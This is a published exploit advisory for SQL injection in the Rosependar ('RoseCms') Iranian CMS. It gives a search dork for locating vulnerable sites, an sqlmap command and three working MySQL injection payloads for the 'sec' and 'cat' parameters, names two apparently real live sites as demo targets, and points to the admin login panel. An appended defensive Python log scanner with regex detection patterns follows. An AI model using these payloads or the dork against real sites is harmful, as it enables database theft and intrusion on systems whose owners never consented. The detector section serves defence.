Rosependar IRANIAN CMS SQL injection

2020.02.27
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
# Exploit Title: Rosependar IRANIAN CMS SQL injection
# Date: 2020-02-26
# Exploit Author: S I R M A X
# Vendor Homepage: https://www.rosependar.ir/
# Dork: intext:"Powered By RoseCms" inurl:sec=
# Version: All Version
# Tested on: win,linux
=================================================================================
[SQL injection]
[+] (Vulnerability = Sql injection ) Storm Security Team of IRan
[+] parameter = sec & cat
=================================================================================
[+] Sqlmap:
[-] sqlmap -u "http://victim.com/[PATH]&sec="
[#] Testing Method:
[+] - boolean-based blind
[+] - error-based
[+] - time-based blind
=================================================================================
|||||||||||||||||||||||
Parameter: sec (GET) ||
|||||||||||||||||||||||
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=major/41&mode=branch&sec=109' AND 5547=5547 AND 'MmrR'='MmrR
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: page=major/41&mode=branch&sec=109' AND (SELECT 8985 FROM(SELECT COUNT(*),CONCAT(0x7162717071,(SELECT (ELT(8985=8985,1))),0x71716a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xaBp'='xaBp
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=major/41&mode=branch&sec=109' AND (SELECT 8166 FROM (SELECT(SLEEP(5)))BldJ) AND 'wptR'='wptR
=================================================================================
Demo:
[+] http://www.filand.ir/?page=major/41&mode=branch&sec=[SQL]
[+] http://www.kaci.ir/?page=major/8&tp=1&cat=[SQL]
=================================================================================
[#] The admin and user login panel is one admin panel => victim.com/index.php?page=major/19
=================================================================================
[=] T.me/Sir_Max
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
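
For operators of an affected site, the following is an added example (not part of the original advisory and not vendor code) that scans web access logs for the three techniques listed above in the sec and cat parameters. It assumes combined-format log lines and that legitimate sec and cat values are plain numeric ids, as in sec=109; the function names and the sample log are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, quote, urlsplit

WATCHED = ("sec", "cat")  # parameters the advisory names as injectable
# One signature per technique listed in the advisory; most specific first.
TECHNIQUES = [
    ("time-based blind", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("error-based", re.compile(r"floor\s*\(\s*rand\s*\(|information_schema", re.I)),
    ("boolean-based blind", re.compile(r"\b(and|or)\s+\(?'?\w+'?\s*=\s*'?\w+", re.I)),
]
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(value):
    """Return None for a plain numeric id, otherwise a technique label."""
    if re.fullmatch(r"[0-9]+", value):  # assumption: sec/cat are numeric ids
        return None
    for label, pattern in TECHNIQUES:
        if pattern.search(value):
            return label
    return "non-numeric value"

def scan(lines):
    """Return (line number, parameter, label) for each suspicious watched value."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        # parse_qs percent-decodes, so encoded payloads are matched in clear text
        query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        for name in WATCHED:
            for value in query.get(name, []):
                label = classify(value)
                if label:
                    findings.append((number, name, label))
    return findings

def log_line(query):
    return f'192.0.2.10 - - [27/Feb/2020:10:00:00 +0000] "GET /?{query} HTTP/1.1" 200 512'

# Constructed sample log (192.0.2.10 is a documentation address); the payload
# strings are taken or trimmed from the advisory text above.
SAMPLE_LOG = [
    log_line("page=major/41&mode=branch&sec=109"),
    log_line("page=major/41&mode=branch&sec=" + quote("109' AND 5547=5547 AND 'MmrR'='MmrR")),
    log_line("page=major/41&mode=branch&sec=" + quote("109' AND (SELECT 8166 FROM (SELECT(SLEEP(5)))BldJ) AND 'wptR'='wptR")),
    log_line("page=major/8&tp=1&cat=" + quote("8' AND FLOOR(RAND(0)*2) AND 'a'='a")),
    log_line("page=major/8&tp=1&cat=abc"),
]
if __name__ == "__main__": print(scan(SAMPLE_LOG))
```

The same numeric check in classify() can serve as server-side input validation for both parameters, alongside parameterized queries in the application.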


Copyright 2024, cxsecurity.com

 
